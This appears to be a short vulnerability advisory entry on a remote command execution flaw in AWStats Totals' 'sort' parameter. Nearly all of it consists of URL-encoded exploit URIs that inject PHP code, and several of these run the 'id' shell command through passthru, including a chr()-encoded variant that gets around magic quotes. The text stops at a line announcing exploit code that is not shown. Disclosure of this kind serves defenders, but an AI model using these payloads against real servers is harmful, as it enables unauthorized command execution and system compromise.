|
AWStats Totals 'sort' Parameter Remote Command Execution Vulnerabilities
The following example URIs are available. Note that these example URIs require that magic quotes be disabled, but will work on all versions of PHP. This example will display phpinfo(): http://www.example.com/some/path/awstatstotals.php?sort=%22%5d%2ephpinfo%28%29%2eexit%28%29%2e%24a%5b%22 This example will run the 'id' command on the target system: http://www.example.com/some/path/awstatstotals.php?sort=%22%5d%2epassthru%28%27id%27%29%2eexit%28%29%2e%24a%5b%22 The following example URIs require a version of PHP that parses function calls inside strings (5+, some versions of 4?), but will work if magic quotes are enabled. This example will display phpinfo(): http://www.example.com/some/path/awstatstotals.php?sort=%7b%24%7bphpinfo%28%29%7d%7d%7b%24%7bexit%28%29%7d%7d This example will run the 'id' command on the target system: http://www.example.com/some/path/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d The following exploit code is available: |
|
|
Privacy Statement |
